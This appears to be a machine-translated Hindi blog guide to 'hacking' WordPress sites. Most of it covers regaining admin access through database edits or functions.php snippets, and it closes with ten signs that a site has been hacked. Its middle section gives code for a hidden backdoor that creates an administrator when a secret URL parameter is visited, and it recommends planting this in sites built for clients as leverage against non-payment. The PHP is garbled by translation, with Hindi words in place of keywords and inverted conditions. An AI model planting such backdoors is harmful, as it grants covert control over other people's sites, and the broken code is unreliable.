वर्डप्रेस वेबसाइट, पूरी गाइड में कैसे हैक करें

वर्डप्रेस वेबसाइट में हैक कैसे करें, पूरा गाइड


हम किसी भी अवैध या दुर्भावनापूर्ण व्यवहार को न तो स्वीकार करते हैं, न ही अनुमोदित करते हैं और न ही प्रोत्साहित करते हैं! इस लेख का उद्देश्य यह बताना है कि आप जिस WordPress साइट पर पहुँचते हैं, उसे कैसे हैक या पुनः प्राप्त किया जा सकता है, या जिसे आपके पास संपादन, व्यवस्थापक और एक्सेस करने के अधिकार हैं। आप जो कुछ भी करते हैं, आप अपने दम पर कर रहे हैं. हम आपके कार्यों के लिए जिम्मेदार नहीं हैं। यह मार्गदर्शिका केवल शैक्षिक उद्देश्यों के लिए कार्य करती है.

बताए गए तरीके आपको साइट तक पहुंच हासिल करने में मदद करेंगे, भले ही आपके पास अब कोई खाता न हो, लेकिन साइट के बारे में कुछ जानकारी की आवश्यकता होगी और वे किसी भी यादृच्छिक वर्डप्रेस इंस्टॉलेशन को हैक करने में आपकी मदद नहीं करेंगे।.

इस गाइड में, हम आपको दिखाने जा रहे हैं:

  • वर्डप्रेस वेबसाइट में हैक कैसे करें
  • WordPress में backdoor कैसे बनाये
  • एफ़टीपी के माध्यम से एक नया उपयोगकर्ता खाता कैसे बनाया जाए
  • 10 संकेत आपकी वर्डप्रेस साइट हैक हो गए हैं

Contents

वर्डप्रेस वेबसाइट में हैक कैसे करें, पूरा गाइड

स्थितियों में आप अपने आप को मदद कर सकते हैं

यदि आप निम्नलिखित में से किसी एक स्थिति में हैं, तो हमारे तरीके आपको पुनः प्राप्त करने में मदद करेंगे:

  • आप उपयोगकर्ता नाम या ईमेल पता भूल गए
  • रीसेट पासवर्ड विकल्प होस्टिंग सर्वर पर काम नहीं करता है
  • रीसेट पासवर्ड ईमेल के माध्यम से नहीं आ रहे हैं
  • अब आपके पास खाते के ईमेल पते तक पहुँच नहीं है
  • आपको उपयोगकर्ता नाम और पासवर्ड पता है, लेकिन संयोजन केवल काम नहीं करता है

नीचे वर्णित विधियों का उपयोग करने के लिए, आपको आवश्यकता होगी निम्न में से केवल एक:

  • एफ़टीपी सर्वर तक पहुँच, या
  • cPanel सर्वर तक पहुँच, या
  • MySQL डेटाबेस तक पहुँच और इसे दूर से कनेक्ट करने की क्षमता

विधि # 1 – MySQL तरीका है

मौजूदा उपयोगकर्ता का पासवर्ड (या यदि आवश्यक हो तो उपयोगकर्ता नाम) बदलने के लिए या नया खाता बनाने के लिए इस पद्धति का उपयोग करें। आपको साइट के डेटाबेस में cPanel एक्सेस या प्रत्यक्ष MySQL एक्सेस की आवश्यकता होगी. आइए मौजूदा उपयोगकर्ता के पासवर्ड को बदलकर शुरू करें.

यदि आप cPanel का उपयोग कर रहे हैं, तो लॉगिन (cPanel को हमेशा एक्सेस किया जा सकता है) https://yoursite.com:2083 लिंक), ढूँढें और phpMyAdmin खोलें. डेटाबेस और टेबल की सूची बाईं ओर है. आप उस तालिका की तलाश कर रहे हैं जो समाप्त होती है _users. यह शायद होगा wp_users, लेकिन अगर आपके पास सर्वर पर एक से अधिक वर्डप्रेस साइट स्थापित हैं, तो आपको सही पता लगाना होगा.

सही तालिका में वह उपयोगकर्ता होगा जिसे आप उसमें संपादित करना चाहते हैं। यदि आप कुछ बाहरी क्लाइंट जैसे MySQL से जुड़ रहे हैं तो उसी प्रक्रिया का पालन करें SQLyog. एक बार जब आप तालिका और वास्तविक उपयोगकर्ता रिकॉर्ड का पता लगा लेते हैं, तो पासवर्ड बदलने का समय आ जाता है.

जैसा कि आप अब तक समझ गए हैं, पासवर्ड में सहेजा गया है user_pass फ़ील्ड, MD5 एल्गोरिथ्म का उपयोग करके हैशेड। को खोलो ऑनलाइन एमडी 5 जनरेटर उस पासवर्ड को दर्ज करें जिसे आप उपयोग करना चाहते हैं और “हैश” पर क्लिक करें।. उत्पन्न स्ट्रिंग की प्रतिलिपि बनाएँ और मूल पासवर्ड को बदलें इसके साथ। PhpMyAdmin में, आप इस पर डबल-क्लिक करके फ़ील्ड को संपादित कर सकते हैं। अन्य MySQL क्लाइंट में प्रक्रिया समान है। परिवर्तन सहेजें और अपने नए पासवर्ड के साथ वर्डप्रेस पर लॉगिन करें.

WP उपयोगकर्ता तालिका

उपयोगकर्ता नाम, हैशेड पासवर्ड और ईमेल में संग्रहीत हैं wp_users डेटाबेस तालिका

अभी भी विधि # 1 पर – एक नया उपयोगकर्ता बना रहा है

एक नया उपयोगकर्ता बनाना थोड़ा अधिक जटिल है, लेकिन अभी भी एक मिनट से भी कम समय में प्रबंधनीय है. एक नया रिकॉर्ड बनाएं उपयोगकर्ता तालिका में और पॉप्युलेट करें: user_login, user_pass (ऊपर वर्णित MD5 फ़ंक्शन का उपयोग करके हैशेड) और user_email। अन्य सभी क्षेत्र खाली रह सकते हैं; वे बात नहीं करते। नया रिकॉर्ड सहेजें। एक बार सेव करने के बाद, MySQL इसे एक यूनिक आईडी देगा। यह आईडी फ़ील्ड की संख्या है। इसे याद रखना.

अब जाना है _usermeta तालिका। याद है, तालिका का उपसर्ग उपयोगकर्ताओं के समान ही होना चाहिए. उदाहरण के लिए wp_users तथा wp_usersmeta. यदि उपसर्ग समान नहीं है, तो आप गलत तालिका (कुछ अन्य WP स्थापना के) का संपादन कर रहे हैं और नया खाता काम नहीं करेगा। हम दो नए रिकॉर्ड बनाएंगे पर ध्यान न दें umeta_id उन दोनों के लिए क्षेत्र। सेट यूज़र आईडी आपके द्वारा याद किए गए मान के लिए फ़ील्ड (उपयोगकर्ताओं की तालिका में नया आईडी मान)। पहला रिकॉर्ड सेट के लिए meta_key सेवा wpct_user_level तथा meta_value सेवा 10. दूसरे के लिए meta_key सेवा wpct_capabilities तथा meta_value सेवा एक: 1: {s: 13: "व्यवस्थापक", बी: 1;}. दोनों को बचाओ। आपने किया है – लॉगिन!

विधि # 2 – functions.php तरीका

इस दृष्टिकोण का उपयोग या तो संपादन फ़ंक्शन द्वारा किया जा सकता है। cPanel के माध्यम से या ऐसा करने के लिए FTP क्लाइंट का उपयोग करके। यदि cPanel का उपयोग करके फ़ाइल प्रबंधक ढूंढें और इसे खोलें. सबसे पहले, हमें सक्रिय थीम के फ़ोल्डर को खोजना होगा.

के लिए जाओ public_html / wp_content / विषयों फ़ोल्डर। यदि आप तुरंत अपने विषय को देखते हैं और जानते हैं कि यह कौन सा है – महान। इसका फ़ोल्डर खोलें और संपादन शुरू करें functions.php. यदि नहीं, तो साइट खोलें, कहीं भी राइट-क्लिक करें, “स्रोत देखें” चुनें। फिर Ctrl + F दबाएं और टाइप करना शुरू करें / विषयों / जल्द ही आपके पास बहुत सारे URL हाइलाइट हो जाएंगे, और आप सक्रिय विषय के फ़ोल्डर नाम को नहीं पहचान पाएंगे.

इसे फ़ाइल संरचना में ढूंढें, खोलें और संपादन शुरू करें functions.php. फ़ाइल के अंत में निम्नलिखित कोड को कॉपी / पेस्ट करें. समापन का मन ?> अगर आपके पास है तो PHP टैग. उन्हें अंतिम पंक्ति में होना है। इसलिए उनके सामने कोड डालें.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

अगर (उपयोगकर्ता नाम_न्यास ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (सरणी ('ID' => $ user_id, 'उपनाम' => $ new_user_email));

$ उपयोगकर्ता = नया WP_User ($ user_id);
$ उपयोगकर्ता-> set_role ( 'व्यवस्थापक');
}

अपने नए खाते को दर्शाने के लिए कोड की केवल पहली दो पंक्तियों को संपादित करें. अगर उस ईमेल के साथ WP में पहले से ही एक उपयोगकर्ता है, तो नया खाता नहीं बनाया जाएगा, इसलिए सुनिश्चित करें कि यह नया है. पासवर्ड को भी बदलें – स्क्रिप्ट किडिज़ द्वारा हैक नहीं किया गया। फ़ाइल को सहेजने के बाद बस अपनी साइट खोलें, कोड चलाया जाएगा, एक नया खाता जिसमें व्यवस्थापक विशेषाधिकार बनाए गए हैं और आप इसके साथ लॉगिन कर पाएंगे.

ऐसा करने के बाद, कोड को हटाना याद रखें functions.php.

हैकिंग के अन्य तरीके

FTP, cPanel या MySQL पासवर्ड को जानकर आप यह साबित कर रहे हैं कि आपके पास सर्वर तक वैध पहुंच है और इसलिए वर्डप्रेस इंस्टॉलेशन (एस) तक भी पहुंच होनी चाहिए। यदि आपके पास उन खातों में से कोई भी नहीं है, तो आप कोई अच्छा नहीं है (अन्य लोगों की साइटों में हैकिंग), और अच्छा नहीं है!

कृपया याद रखें कि किसी भी कंप्यूटर, साइट या सर्वर पर अनधिकृत पहुँच प्राप्त करना एक गंभीर अपराध है और इसे अधिकांश देशों में तुरंत निपटा दिया जाता है।.

यदि आप डर गए हैं कि आपकी वर्डप्रेस साइट हैक हो सकती है, तो कृपया इस पेज को मुफ्त वर्डप्रेस सुरक्षा स्कैनर से जांचें। यदि आपके पास अपना ब्लॉग सेट करने का समय नहीं है, तो हम इसे आपके लिए करते हैं.

WordPress में backdoor कैसे बनाये

जब सामने का दरवाजा बंद हो जाता है, तो आप पिछले दरवाजे की कोशिश कर सकते हैं। यह साइट पर प्रवेश करने के लिए कोड का उपयोग करने के लिए उपयोग किए बिना एक दुर्भावनापूर्ण तरीके से लग सकता है, लेकिन वास्तव में ऐसे समय होते हैं जब आपको अपनी साइट को नियंत्रित करने की आवश्यकता होती है यदि कोई इसे चुरा लेता है.

यदि यह आपके द्वारा किए गए कुछ अन्य लोगों के लिए वेबसाइटें बना रहा है, तो जल्द या बाद में एक ग्राहक होगा जो आपको आपके काम के लिए भुगतान करने से मना कर देगा; एक क्लाइंट जो आपकी लॉगिन जानकारी को हटा देगा और आपके द्वारा की गई हर चीज को अपने नियंत्रण में ले लेगा। कभी-कभी, एफ़टीपी के माध्यम से एक नया उपयोगकर्ता बनाने या पासवर्ड रीसेट करने के लिए पर्याप्त होगा। जब यह पर्याप्त नहीं है, आप अपने तरीके से वापस हैक करना चाहते हैं या अपने व्यवस्थापक पृष्ठों पर पिछले दरवाजे का उपयोग कर सकते हैं.

लेकिन अगर आपने अपने वर्डप्रेस वातावरण में एक छोटे से कोड को छिपाने का फैसला किया है, तो आप अपने आप को कुछ गरिमा और बचा सकते हैं व्यवस्थापक विशेषाधिकारों के साथ वर्डप्रेस साइट तक पहुंच प्राप्त करें. और यह वह जगह है जहाँ से खेल शुरू होते हैं.

कोई फर्क नहीं पड़ता कि यह चोर कितनी बार आपकी जानकारी को हटाता है या किसी सर्वर पर बैकअप लेता है जो वह संभवतः अपना मालिक है, एक मौका है कि वह पिछले दरवाजे के बारे में कुछ भी नहीं जानता है। यदि उसने किया, तो संभवतः उसे वर्डप्रेस की स्थापना में आपकी सहायता की आवश्यकता नहीं होगी, ठीक है?

एक पिछले दरवाजे बनाएँ:

ठीक है, बात के साथ पर्याप्त; यहाँ एक कोड है जिसे आपको काम पूरा करने की आवश्यकता होगी:

  1. कार्यों को खोलें
  2. निम्नलिखित कोड कॉपी / पेस्ट करें:
  3. add_action ('wp_head', 'wploop_backdoor');
    फ़ंक्शन wploop_backdoor () {
    यदि ($ _GET ['पिछले दरवाजे'] == 'नॉकॉकॉक') {
    की आवश्यकता होती है ( '/ registration.php WP-शामिल');
    यदि (username_exists ('उपयोगकर्ता नाम')) {
    $ user_id = wp_create_user ('नाम', 'पास');
    $ उपयोगकर्ता = नया WP_User ($ user_id);
    $ उपयोगकर्ता-> set_role ( 'व्यवस्थापक');
    }
    }
    }
    ?>
  4. परिवर्तनों को सुरक्षित करें

यदि आप कोड को छोड़ देते हैं जैसा कि यह है, तो आपको साइट पर एक नया व्यवस्थापक बनाने के लिए करना होगा http://www.yourdomain.com/?backdoor=knockknock

पृष्ठ लोड होने के बाद, आपका नया उपयोगकर्ता नाम है “नाम” और पासवर्ड “उत्तीर्ण करना”.

बेशक, आप इसे कोड में बदल सकते हैं ऊपर ‘नाम’ और ‘पास’ बदलकर जो भी आप चाहते हैं। आप अपने साथ आने वाली किसी भी चीज़ के लिए ‘पिछले दरवाजे’ और / या ‘नॉकॉकॉक’ को बदलकर अपने पिछले दरवाजे का लिंक भी बदल सकते हैं।.

फ़ंक्शन का प्रयास करें – न केवल यह मजेदार है, बल्कि यह भविष्य में कभी भी आपकी मदद कर सकता है जब आप किसी ऐसे व्यक्ति के लिए एक वेबसाइट बनाने के बारे में होंगे जिस पर आप पूरी तरह से भरोसा नहीं कर सकते। आपको अपने वर्डप्रेस और ब्लॉगिंग कौशल को भी समतल करना चाहिए.

एफ़टीपी के माध्यम से एक नया उपयोगकर्ता खाता कैसे बनाया जाए

वर्डप्रेस पर नए यूजर अकाउंट बनाना बहुत आसान है। एक व्यवस्थापक के रूप में, आपको करने की आवश्यकता है उपयोगकर्ता व्यवस्थापक पृष्ठ पर नेविगेट करें जहाँ आप किसी भी उपयोगकर्ता की भूमिका के लिए एक नया खाता बना सकते हैं। यह सेकंड के एक मामले में किया जा सकता है और एक नया बनाया उपयोगकर्ता तुरंत दिए गए उपयोगकर्ता नाम और पासवर्ड के साथ लॉग इन कर सकता है.

लेकिन अगर आप अपने WordPress व्यवस्थापक तक पहुंच खो देते हैं तो क्या होता है? चीजें थोड़ी अधिक जटिल हो सकती हैं, लेकिन चिंता न करें – हमारे पास आपके लिए एक फ़ंक्शन है जो आपके व्यवस्थापक जीवन को बचा सकता है.

क्या किसी अन्य व्यवस्थापक ने आपका खाता हटा दिया है, चाहे आपने डेटाबेस से सभी उपयोगकर्ताओं को गलती से हटा दिया हो, एक खराबी प्लगइन का उपयोग किया हो या हैक हो गया हो, फिर भी आप नियंत्रण में वापस आ सकते हैं। कभी-कभी आप केवल अपने एफ़टीपी सर्वर तक पहुंच प्राप्त करने में सक्षम हो सकते हैं जबकि एचटीटीपी एक आपकी पहुंच से बाहर होगा और आपको एक नया व्यवस्थापक बनाने की आवश्यकता होगी। जबकि यह एक दुर्लभ मामला हो सकता है, निम्नलिखित फ़ंक्शन आपको बचाएगा.

वर्डप्रेस व्यवस्थापक वातावरण के बाहर एक नया खाता बनाने के लिए, आपको अपनी साइट पर एफ़टीपी एक्सेस की आवश्यकता होगी। एक व्यवस्थापक के रूप में, आपके पास अपने सर्वर में लॉग इन करने के लिए सभी आवश्यक जानकारी होनी चाहिए और आप इस विषय में एक नया फ़ंक्शन बनाकर जल्दी से एक नया खाता बना सकते हैं.

FTP के माध्यम से एक नया उपयोगकर्ता खाता बनाएँ:

  1. FTP क्लाइंट खोलें और अपने खाते से कनेक्ट करें
  2. Wp-content / themes में नेविगेट करें
  3. आपके द्वारा उपयोग की जा रही थीम का फ़ोल्डर खोलें
  4. Functions.php फ़ाइल को खोजें और इसे संपादित करें
  5. निम्न फ़ंक्शन को कॉपी और पेस्ट करें:
  6. function admin_account () {
    $ उपयोगकर्ता = 'उपयोगकर्ता नाम';
    $ पास = 'पासवर्ड';
    $ ईमेल = '[email protected]';
    अगर (username_exists ($ उपयोगकर्ता) &&! email_exists ($ ईमेल)) {
    $ user_id = wp_create_user ($ उपयोगकर्ता, $ पास, $ ईमेल);
    $ उपयोगकर्ता = नया WP_User ($ user_id);
    $ उपयोगकर्ता-> set_role ('व्यवस्थापक');
    }}
    ADD_ACTION ( 'init', 'admin_account');
    
  7. उपयोगकर्ता नाम, पासवर्ड और ईमेल को कुछ अद्वितीय में बदलें
  8. परिवर्तनों को सुरक्षित करें

सुनिश्चित करें कि उपयोगकर्ता नाम, पासवर्ड और ईमेल पता जो आप फ़ंक्शन में सेट करते हैं, अद्वितीय हैं या अन्यथा फ़ंक्शन ठीक से काम नहीं करता है। एक बार जब आप परिवर्तन सहेज लेते हैं, तो आप कर चुके हैं और आप अपने WP लॉगिन पैनल पर नेविगेट कर सकते हैं। वापस लॉग इन करने के लिए नई जानकारी का उपयोग करें और एक बार जब आपने खाता सत्यापित कर लिया है, तो आप फ़ंक्शन.php फ़ाइल से फ़ंक्शन को हटा सकते हैं.

ऊपर दिखाया गया फ़ंक्शन एक व्यवस्थापक खाता बनाता है लेकिन आप किसी अन्य उपयोगकर्ता भूमिका के साथ खाता बनाने के लिए इसे आसानी से संशोधित कर सकते हैं। केवल 8 पर भूमिका बदलेंवें पंक्ति संपादक के कोड, लेखक, योगदानकर्ता, ग्राहक या आपके द्वारा बनाई गई किसी भी अन्य उपयोगकर्ता भूमिका के लिए.

दुर्भाग्य से, यदि आपने अपना व्यवस्थापक खाता खो दिया है, तो आपने उस उपयोगकर्ता नाम के तहत लिखे गए सभी पोस्ट भी खो दिए हैं। इसलिए आपको हमेशा एक बैकअप रखना चाहिए जिसे आप आसानी से प्राप्त कर सकते हैं। यदि आप अपना व्यवस्थापक खाता रखते हुए इसे पढ़ रहे हैं, तुरंत बैकअप बनाने के लिए इसे रिमाइंडर के रूप में लें और इस लेख को बुकमार्क करें कि भविष्य में आपको वर्डप्रेस के बाहर एक खाता बनाने की आवश्यकता है.

10 संकेत आपकी वर्डप्रेस साइट हैक हो गए हैं

वर्डप्रेस एक बहुत बड़ा ब्लॉगिंग प्लेटफॉर्म है। लाखों उपयोगकर्ता हैं और ऐसा लगता है कि संख्या तेजी से हर दिन बढ़ रही है। लोग अन्य सामग्री प्रबंधन प्रणालियों में बनाई गई अपनी वेबसाइटों को इस खुले स्रोत प्रणाली में स्थानांतरित करने की कोशिश करते हैं, जितना आप सोच सकते हैं। और, जबकि यह अच्छा है, इसका मतलब है कि रैंडम साइट्स पर आक्रमण करने की कोशिश करने पर हैकर्स वर्डप्रेस को नंबर-वन में भी डाल देंगे.

आमतौर पर, यदि आप हैक हो जाते हैं, तो आपको उस बारे में तुरंत पता चल जाएगा। आपकी साइट दुर्गम हो जाएगी; आप लॉग इन नहीं कर पाएंगे और कभी-कभी एक हैकर सामने वाले पृष्ठ पर एक संदेश भी छोड़ देगा। लेकिन अधिक से अधिक बार नहीं, आप यह भी नहीं देख सकते हैं कि कुछ बदल गया है. लेख के इस भाग में, हम आपको कई संकेत दिखाने वाले हैं जो आपको दिखा सकते हैं कि आपकी वर्डप्रेस साइट हैक हो गई है और समस्या के कुछ समाधान हैं.

1. असफल लॉगिन

यह संकेत बहुत स्पष्ट है। यदि आपने बिना किसी परेशानी के कुछ समय के लिए उपयोगकर्ता नाम और पासवर्ड संयोजन का उपयोग किया है, तो आपको संदेह हो सकता है कि क्या अचानक वर्डप्रेस आपके खाते को नहीं बदलेगा. यदि किसी हैकर को आपकी साइट पर लॉग इन करने के लिए मिला है, तो संभावना है कि वह आपके व्यवस्थापक विशेषाधिकारों को जल्दी से बदल देगा.

हो सकता है कि उसने आपका पासवर्ड बदल दिया हो या आपके खाते को पूरी तरह से हटा दिया हो। इससे पहले कि आप गलत उपयोगकर्ता नाम / पासवर्ड के बारे में वर्डप्रेस संदेशों के बाद घबराहट करना शुरू करें, कृपया इस तथ्य पर विचार करें कि आपने गलत संयोजन दर्ज किया होगा या आपने कैप्स लॉक बटन चालू किया होगा।.

समाधान: ईमेल के माध्यम से पासवर्ड को पुनर्प्राप्त करने का प्रयास करें या वापस लॉग इन करने के लिए किसी अन्य खाते का उपयोग करें। यह सुनिश्चित करने के लिए कि आप लॉगिन सुरक्षित रहते हैं, हम स्थापित करने की सलाह देते हैं निन्जा लॉगिन करें WordPress के लिए प्लगइन.

2. आपकी साइट पर दुर्भावनापूर्ण सामग्री जोड़ी जाती है

साइट में एक मैलवेयर चेतावनी है

यदि आप अपनी साइट पर अपरिचित सामग्री को देखना शुरू करते हैं, तो आप चिंता करना शुरू कर सकते हैं। जब उन्हें आपके व्यवस्थापक क्षेत्र तक पहुंचने का मौका मिलता है, हैकर्स आपके कोर और आपकी थीम और प्लगइन दोनों फाइलों को बदलने में सक्षम होंगे. इसका मतलब है कि उन्हें अपनी इच्छानुसार कुछ भी बदलना होगा.

हालांकि कुछ हैकर्स आपकी साइट के रंग-रूप में बहुत बदलाव करेंगे और हो सकता है कि आपको हैक कर लिया गया हो, दूसरे भी इसके बारे में अधिक सूक्ष्म होंगे।.

समाधान: वेबसाइट कोड में छिपी हुई सामग्री की तलाश करें। आपकी साइट के पाद लेख में लगाए गए दुर्भावनापूर्ण साइट्स हैकर्स के लिंक हो सकते हैं, या उन्होंने पॉपअप स्थापित किए होंगे जो आपके ग्राहकों के लिए नियमित आधार पर खुलेंगे। अपनी साइट को स्कैन करने के लिए या ऐसी समस्याओं के लिए अपनी साइट की लगातार निगरानी के लिए सुरक्षा निंजा का उपयोग करें.

3. संदिग्ध दौरा

यदि आप अपनी वेबसाइट पर नज़र नहीं रख रहे हैं, तो आपको तुरंत ऐसा करना शुरू कर देना चाहिए। Google Analytics का उपयोग करने का एक सरल तरीका है, जो कई अन्य विशेषताओं के बीच, आपको बता सकता है कि आपको कितनी विज़िट मिलती हैं और वे विज़िट कहाँ से आ रही हैं। कुछ समय बाद, आपको अपनी वेबसाइट का पता चल जाएगा। इसका मतलब है कि आपको पता चल जाएगा कि दौरे कहां से आ रहे हैं, आपको पता चल जाएगा कि आप कब एक नया अभियान शुरू करते हैं और जब जंगली में नए प्रचार लिंक होते हैं.

लेकिन अगर आप अचानक नोटिस करते हैं कि आपकी साइट को संदिग्ध डोमेन से बड़ी संख्या में नए दौरे मिल रहे हैं, आप इसे आगे जांचना चाहेंगे क्योंकि आपकी साइट अभी हैक हो सकती है। आमतौर पर, इस तरह की यात्राओं के परिणामस्वरूप 100% उछाल दर होती है, जिसका अर्थ है कि केवल एक पृष्ठ एक्सेस किया गया था। हैकर्स अक्सर स्वचालित सिस्टम का उपयोग करेंगे जो अन्य खराब साइटों को आपके पास ले जाएंगे। क्या यह बुरा कोड है जो आपकी साइट पर निष्पादित हो जाता है या आप एक स्पैमिंग नेटवर्क का हिस्सा बन गए हैं, चीजें गंभीर हो सकती हैं, और आपको दुर्भावनापूर्ण कोड के लिए अपनी साइट की जांच करनी होगी.

समाधान: उपयोग Google वेबमास्टर टूल संदिग्ध डोमेन खोजने के लिए

4. यातायात में अचानक गिरावट

सुरक्षित ब्राउज़िंग Ssite स्थिति

हैक होने के अंतिम उल्लेख के संकेत के विपरीत, यह आपको सचेत कर सकता है क्योंकि अचानक विज़िट की संख्या में गिरावट है। बजाय इसके कि आप नई यात्राओं का जिक्र करें, एक हैकर आपकी साइट से विज़िट भेज सकता है. ऐसा हो सकता है क्योंकि किसी हैकर ने आपकी साइट को किसी दूसरे पर पुनर्निर्देशित कर दिया है। कम आगंतुक मिलने का दूसरा कारण यह है कि Google ने आपकी साइट को ब्लैकलिस्ट कर दिया है। यह क्रिया प्रत्येक उपयोगकर्ता को एक संदेश दिखाएगी जो आपकी साइट को नहीं खोलना चुन सकता है क्योंकि यह संक्रमित है.

समाधान: Google का उपयोग करें सुरक्षित ब्राउज़िंग साइट की स्थिति यह जांचने के लिए कि क्या आपकी साइट असुरक्षित के रूप में चिह्नित है और वर्तमान में यात्रा करने के लिए खतरनाक है.

5. खोज इंजन के परिणाम अजीब हैं

यदि आपने अपनी साइट पर कोई परिवर्तन नहीं देखा है, लेकिन आपको पता चलता है कि Google और अन्य खोज इंजनों में खोज परिणाम अजीब हैं (विभिन्न शीर्षक और अन्य मेटा-डेटा दिखाएं), यह हैक की गई साइट का एक स्पष्ट संकेत हो सकता है। हो सकता है कि किसी हैकर ने आपकी सामग्री को ऐसे तरीके से बदल दिया हो जो केवल एक विशेषज्ञ को दिखाई दे सकता है। फिर भी, खोज इंजन परिणामों में परिवर्तन दिखाई देगा.

समाधान: के साथ अपनी साइट की जाँच करें Google वेबमास्टर टूल, और जांचें कि क्या आपकी साइट इस से हैक हो गई है मुफ्त ऑनलाइन उपकरण.

6. आप ईमेल नहीं भेज / प्राप्त कर सकते हैं

एक बार जब कोई हैकर आपकी साइट पर पहुंच जाता है, तो वह शायद करना चाहेगा हर किसी को स्पैम करने के लिए अपने सर्वर का उपयोग करें. जब आपको पता चलता है कि आप अपने वर्डप्रेस से नए ईमेल भेज या प्राप्त नहीं कर सकते हैं, तो यह एक स्पष्ट संकेत हो सकता है कि आप हैक हो गए हैं। अपने ईमेल को एक बार फिर से देखें, फिर यह सुनिश्चित करने के लिए अपने प्रदाता से पूछें कि कोई त्रुटि तो नहीं है.

समाधान: अपने वर्डप्रेस का परीक्षण करें मेल समारोह इस मुफ्त प्लगइन के साथ.

7. साइट मौजूद नहीं है

सर्वर नहीं मिला

कई बार जब हैकर्स दुर्भावनापूर्ण कोड, रीडायरेक्ट करने वाले उपयोगकर्ताओं या स्पैम के लिए आपके ईमेल का उपयोग करने के लिए आपकी साइट तक नहीं पहुंच पाते हैं। कभी कभी, वे सब करना चाहते हैं अपनी साइट दुर्घटनाग्रस्त हो जाएगा. शायद ही, एक हैकर सफलतापूर्वक पूरे सर्वर से सब कुछ हटा देगा। इसलिए यह महत्वपूर्ण है कि आप अपनी फ़ाइलों को किसी प्रसिद्ध होस्टिंग कंपनी में होस्ट करें जो सुरक्षा का ध्यान रखे और आपकी वेबसाइट के दैनिक या कम से कम साप्ताहिक बैकअप भी रखे। यह एक अच्छा अभ्यास है कि आप समय-समय पर अपने स्वयं के बैकअप भी करते हैं ताकि साइट को जल्दी से बहाल किया जा सके.

समाधान: वर्डप्रेस में बैकअप प्रबंधन के लिए सबसे अच्छा प्लगइन्स में से एक स्थापित करें.

8. संदिग्ध फाइलें

दुर्भावनापूर्ण सामग्री के समान जो मौजूदा फ़ाइलों में जोड़ी जा सकती है, एक हैकर आपके रूट फोल्डर में कहीं भी अतिरिक्त फाइलें लगा सकता है. वर्डप्रेस के आसपास अपना रास्ता जानने के लिए यह एक अच्छी बात है, लेकिन यदि आप अनुभव नहीं कर रहे हैं, तो आपके पास अपने निपटान में एक सुरक्षा उपकरण होना चाहिए जो आपकी सभी फ़ाइलों और गतिविधियों की जांच कर सके। हाल ही में, हमने सुरक्षा निंजा की समीक्षा की जो आपकी सभी वर्डप्रेस फ़ाइलों की जाँच करने के लिए एक आदर्श उपकरण है.

समाधान: उन फ़ाइलों को खोजने का प्रयास करें जो आपके वर्डप्रेस इंस्टॉलेशन से संबंधित नहीं हैं। अपनी साइट को नियमित रूप से स्कैन करने और उन फ़ाइलों को स्वचालित रूप से खोजने के लिए सुरक्षा निंजा का उपयोग करें। फिर फ़ाइलों को हटा दें या संक्रमित फ़ाइलों से दुर्भावनापूर्ण कोड हटा दें। सुरक्षा निन्जा के लिए कोर स्कैनर ऐड-ऑन न भूलें.

9. नए सदस्य

आपकी साइट के आधार पर, आप नए सदस्यों को जोड़ने में सक्षम हो सकते हैं। उस मामले में, एक ईमेल जो आपको नए पंजीकृत उपयोगकर्ताओं के बारे में बता रहा है, वह अलार्म ट्रिगर कर सकता है। यदि अन्य व्यवस्थापक हैं जो नए सदस्यों को जोड़ने की क्षमता रखते हैं, तो उनके साथ संदिग्ध गतिविधि की जांच करें.

समाधान: निशुल्क प्लगइन के साथ लॉगिन URL बदलें, अपने .htpasswd फ़ाइल का उपयोग करके अपने वर्डप्रेस लॉगिन पृष्ठ तक पहुंच सीमित करें और हर समय अपने लॉगिन फ़ॉर्म की सुरक्षा के लिए लॉगिन निनजा का उपयोग करें।.

10. अपने सर्वर पर अनुसूचित घटनाओं की जाँच करें

कभी-कभी, किसी हैकर को आपकी वेबसाइट पर कोई ऐसा काम नहीं करना चाहिए जिससे वे अपना रास्ता खोज सकें, वे निर्धारित कार्यक्रम छोड़ देंगे जो भविष्य में कभी भी आपकी साइट को नुकसान पहुंचा सकता है। यह तकनीक खतरनाक है क्योंकि एक हैकर पहली बार में अनुभवहीन शिकार का सुराग छोड़ सकता है। आप संक्रमित हो सकते हैं और इसके बारे में कुछ भी नहीं जान सकते हैं.

समाधान: जिस सर्वर का आप उपयोग कर रहे हैं उस पर अपने CRON जॉब्स की जाँच करें और सुनिश्चित करें कि कोई संदिग्ध निर्धारित कार्य नहीं हैं.

समेट रहा हु

हम आशा करते हैं कि यह लेख आपको एक सुरक्षित वर्डप्रेस साइट का प्रबंधन करने में मदद करेगा, और यह आपको बुरी स्थितियों में इसे फिर से प्राप्त करने में मदद करेगा। तथा यहां तक ​​कि अगर आपकी साइट साफ है, तो कृपया इसे प्राप्त न करें.
हमेशा सुनिश्चित करें कि आपका ब्लॉग उतना ही सुरक्षित हो जितना कि यह हो सकता है। हम वर्डप्रेस के लिए सुरक्षा प्लगइन्स का सुझाव देते हैं जो आपको अधिकतर समय बचा सकता है। फिर भी, असुरक्षित पासवर्ड का उपयोग न करें, और अपने वर्डप्रेस साइट में हैक करते समय सावधान रहें.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map